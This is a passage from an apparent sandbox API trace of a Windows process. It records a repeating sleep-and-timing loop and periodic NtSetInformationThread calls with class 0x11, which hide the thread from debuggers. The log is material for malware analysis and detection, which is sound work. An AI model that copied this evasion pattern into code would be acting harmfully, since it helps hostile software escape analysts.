lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x2, wMilliseconds=0x35c)) [0167.027] GetTickCount () returned 0x1d113f8 [0167.027] Sleep (dwMilliseconds=0x3e8) [0167.267] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x6e)) [0167.268] GetTickCount () returned 0x1d118d8 [0167.268] Sleep (dwMilliseconds=0x3e8) [0167.379] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0xdb)) [0167.380] GetTickCount () returned 0x1d11d2d [0167.380] Sleep (dwMilliseconds=0x3e8) [0167.487] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x148)) [0167.488] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0167.488] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0167.488] GetCurrentThread () returned 0xfffffffe [0167.488] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0167.489] GetTickCount () returned 0x1d12181 [0167.489] Sleep (dwMilliseconds=0x3e8) [0167.626] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x1d5)) [0167.626] GetTickCount () returned 0x1d125f4 [0167.626] Sleep (dwMilliseconds=0x3e8) [0167.763] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x261)) [0167.763] GetTickCount () returned 0x1d12a68 [0167.763] Sleep (dwMilliseconds=0x3e8) [0167.857] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x2bf)) [0167.857] GetTickCount () returned 0x1d12eac [0167.858] Sleep (dwMilliseconds=0x3e8) [0168.000] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x3, wMilliseconds=0x34b)) [0168.000] GetTickCount () returned 0x1d13320 [0168.000] Sleep (dwMilliseconds=0x3e8) [0168.251] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x4, wMilliseconds=0x5d)) [0168.251] GetTickCount () returned 0x1d13800 [0168.251] Sleep (dwMilliseconds=0x3e8) [0168.454] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x4, wMilliseconds=0x128)) [0168.454] GetTickCount () returned 0x1d13cb2 [0168.454] Sleep (dwMilliseconds=0x3e8) [0168.736] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x4, wMilliseconds=0x240)) [0168.736] GetTickCount () returned 0x1d141b2 [0168.736] Sleep (dwMilliseconds=0x3e8) [0168.921] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x4, wMilliseconds=0x2fc)) [0168.921] GetTickCount () returned 0x1d14654 [0168.921] Sleep (dwMilliseconds=0x3e8) [0169.248] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x5b)) [0169.249] GetTickCount () returned 0x1d14b83 [0169.249] Sleep (dwMilliseconds=0x3e8) [0169.437] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x116)) [0169.437] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0169.437] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0169.438] GetCurrentThread () returned 0xfffffffe [0169.438] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0169.438] GetTickCount () returned 0x1d15025 [0169.438] Sleep (dwMilliseconds=0x3e8) [0169.577] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x1a3)) [0169.578] GetTickCount () returned 0x1d15498 [0169.578] Sleep (dwMilliseconds=0x3e8) [0169.685] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x210)) [0169.686] GetTickCount () returned 0x1d158ec [0169.686] Sleep (dwMilliseconds=0x3e8) [0169.780] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x26e)) [0169.780] GetTickCount () returned 0x1d15d31 [0169.780] Sleep (dwMilliseconds=0x3e8) [0169.874] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x2cb)) [0169.874] GetTickCount () returned 0x1d16176 [0169.874] Sleep (dwMilliseconds=0x3e8) [0169.968] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x329)) [0169.968] GetTickCount () returned 0x1d165ba [0169.968] Sleep (dwMilliseconds=0x3e8) [0170.097] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x5, wMilliseconds=0x3a6)) [0170.098] GetTickCount () returned 0x1d16a1e [0170.098] Sleep (dwMilliseconds=0x3e8) [0170.201] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x2b)) [0170.201] GetTickCount () returned 0x1d16e72 [0170.201] Sleep (dwMilliseconds=0x3e8) [0170.293] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x88)) [0170.293] GetTickCount () returned 0x1d172b7 [0170.293] Sleep (dwMilliseconds=0x3e8) [0170.482] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x144)) [0170.483] GetTickCount () returned 0x1d17759 [0170.483] Sleep (dwMilliseconds=0x3e8) [0170.590] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x1b1)) [0170.591] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0170.591] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0170.591] GetCurrentThread () returned 0xfffffffe [0170.591] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0170.592] GetTickCount () returned 0x1d17bad [0170.592] Sleep (dwMilliseconds=0x3e8) [0170.641] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x1e0)) [0170.641] GetTickCount () returned 0x1d17fc3 [0170.641] Sleep (dwMilliseconds=0x3e8) [0170.768] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x25c)) [0170.769] GetTickCount () returned 0x1d18427 [0170.769] Sleep (dwMilliseconds=0x3e8) [0170.864] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x2ba)) [0170.864] GetTickCount () returned 0x1d1886b [0170.865] Sleep (dwMilliseconds=0x3e8) [0170.919] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x2f8)) [0170.919] GetTickCount () returned 0x1d18c91 [0170.919] Sleep (dwMilliseconds=0x3e8) [0170.982] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x337)) [0170.982] GetTickCount () returned 0x1d190b6 [0170.982] Sleep (dwMilliseconds=0x3e8) [0171.044] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x375)) [0171.044] GetTickCount () returned 0x1d194dc [0171.044] Sleep (dwMilliseconds=0x3e8) [0171.154] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x3e2)) [0171.154] GetTickCount () returned 0x1d19930 [0171.154] Sleep (dwMilliseconds=0x3e8) [0171.199] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x29)) [0171.199] GetTickCount () returned 0x1d19d46 [0171.199] Sleep (dwMilliseconds=0x3e8) [0171.318] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x96)) [0171.318] GetTickCount () returned 0x1d1a19a [0171.318] Sleep (dwMilliseconds=0x3e8) [0171.403] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0xf4)) [0171.404] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.404] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0171.404] GetCurrentThread () returned 0xfffffffe [0171.404] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0171.405] GetTickCount () returned 0x1d1a5de [0171.405] Sleep (dwMilliseconds=0x3e8) [0171.465] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x132)) [0171.465] GetTickCount () returned 0x1d1aa04 [0171.465] Sleep (dwMilliseconds=0x3e8) [0171.527] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x171)) [0171.527] GetTickCount () returned 0x1d1ae29 [0171.527] Sleep (dwMilliseconds=0x3e8) [0171.594] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x1af)) [0171.595] GetTickCount () returned 0x1d1b24f [0171.595] Sleep (dwMilliseconds=0x3e8) [0171.651] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x1ee)) [0171.651] GetTickCount () returned 0x1d1b674 [0171.651] Sleep (dwMilliseconds=0x3e8) [0171.734] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x23c)) [0171.734] GetTickCount () returned 0x1d1baa9 [0171.734] Sleep (dwMilliseconds=0x3e8) [0171.907] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x2e7)) [0171.908] GetTickCount () returned 0x1d1d1e7 [0171.908] Sleep (dwMilliseconds=0x3e8) [0171.922] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x2f7)) [0171.922] GetTickCount () returned 0x1d1d5dd [0171.922] Sleep (dwMilliseconds=0x3e8) [0171.932] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x306)) [0171.932] GetTickCount () returned 0x1d1d9d4 [0171.932] Sleep (dwMilliseconds=0x3e8) [0171.948] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x316)) [0171.948] GetTickCount () returned 0x1d1ddca [0171.948] Sleep (dwMilliseconds=0x3e8) [0171.968] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x7, wMilliseconds=0x326)) [0171.969] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.969] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0171.969] GetCurrentThread () returned 0xfffffffe [0171.970] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0171.970] GetTickCount () returned 0x1d1e1c1 [0171.970] Sleep (dwMilliseconds=0x3e8) [0172.299] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x85)) [0172.300] GetTickCount () returned 0x1d1e6f0 [0172.300] Sleep (dwMilliseconds=0x3e8) [0172.518] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x160)) [0172.518] GetTickCount () returned 0x1d1ebb1 [0172.518] Sleep (dwMilliseconds=0x3e8) [0172.698] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x21b)) [0172.698] GetTickCount () returned 0x1d1f053 [0172.698] Sleep (dwMilliseconds=0x3e8) [0172.793] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x278)) [0172.793] GetTickCount () returned 0x1d1f498 [0172.793] Sleep (dwMilliseconds=0x3e8) [0172.929] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x305)) [0172.929] GetTickCount () returned 0x1d1f90b [0172.929] Sleep (dwMilliseconds=0x3e8) [0173.022] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x362)) [0173.023] GetTickCount () returned 0x1d1fd50 [0173.023] Sleep (dwMilliseconds=0x3e8) [0173.157] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x3df)) [0173.157] GetTickCount () returned 0x1d201b4 [0173.157] Sleep (dwMilliseconds=0x3e8) [0173.307] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x9, wMilliseconds=0x93)) [0173.307] GetTickCount () returned 0x1d20637 [0173.307] Sleep (dwMilliseconds=0x3e8) [0173.406] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x9, wMilliseconds=0xf1)) [0173.406] GetTickCount () returned 0x1d20a7b [0173.407] Sleep (dwMilliseconds=0x3e8) [0173.640] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x9, wMilliseconds=0x1db)) [0173.641] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0173.641] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0173.641] GetCurrentThread () returned 0xfffffffe [0173.641] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0173.642] GetTickCount () returned 0x1d20f4c [0173.642] Sleep (dwMilliseconds=0x3e8) [0173.901] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x9, wMilliseconds=0x2e4)) [0173.901] GetTickCount () returned 0x1d2143c [0173.901] Sleep (dwMilliseconds=0x3e8) [0174.200] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x24)) [0174.200] GetTickCount () returned 0x1d2194c [0174.200] Sleep (dwMilliseconds=0x3e8) [0174.267] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x63)) [0174.267] GetTickCount () returned 0x1d21d71 [0174.267] Sleep (dwMilliseconds=0x3e8) [0174.320] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0xa1)) [0174.320] GetTickCount () returned 0x1d22197 [0174.320] Sleep (dwMilliseconds=0x3e8) [0174.713] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x227)) [0174.713] GetTickCount () returned 0x1d22704 [0174.713] Sleep (dwMilliseconds=0x3e8) [0174.912] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x2f2)) [0174.912] GetTickCount () returned 0x1d22bb5 [0174.912] Sleep (dwMilliseconds=0x3e8) [0175.150] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xa, wMilliseconds=0x3dc)) [0175.150] GetTickCount () returned 0x1d23086 [0175.150] Sleep (dwMilliseconds=0x3e8) [0175.350] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xb, wMilliseconds=0xbf)) [0175.350] GetTickCount () returned 0x1d23538 [0175.350] Sleep (dwMilliseconds=0x3e8) [0175.600] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xb, wMilliseconds=0x1b8)) [0175.600] GetTickCount () returned 0x1d23a19 [0175.600] Sleep (dwMilliseconds=0x3e8) [0175.886] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xb, wMilliseconds=0x2d1)) [0175.887] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0175.887] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0175.887] GetCurrentThread () returned 0xfffffffe [0175.887] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0175.888] GetTickCount () returned 0x1d23f19 [0175.888] Sleep (dwMilliseconds=0x3e8) [0176.160] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x2)) [0176.161] GetTickCount () returned 0x1d24418 [0176.161] Sleep (dwMilliseconds=0x3e8) [0176.349] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0xbd)) [0176.349] GetTickCount () returned 0x1d248bb [0176.349] Sleep (dwMilliseconds=0x3e8) [0176.537] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x178)) [0176.537] GetTickCount () returned 0x1d24d5d [0176.537] Sleep (dwMilliseconds=0x3e8) [0176.596] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x1b7)) [0176.596] GetTickCount () returned 0x1d25182 [0176.596] Sleep (dwMilliseconds=0x3e8) [0176.620] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x1c6)) [0176.621] GetTickCount () returned 0x1d25579 [0176.621] Sleep (dwMilliseconds=0x3e8) [0176.738] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x243)) [0176.738] GetTickCount () returned 0x1d259dd [0176.738] Sleep (dwMilliseconds=0x3e8) [0176.782] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x272)) [0176.783] GetTickCount () returned 0x1d25df2 [0176.783] Sleep (dwMilliseconds=0x3e8) [0176.897] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x2df)) [0176.897] GetTickCount () returned 0x1d26247 [0176.897] Sleep (dwMilliseconds=0x3e8) [0176.985] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x33d)) [0176.986] GetTickCount () returned 0x1d2668b [0176.986] Sleep (dwMilliseconds=0x3e8) [0177.253] GetLocalTime (in: 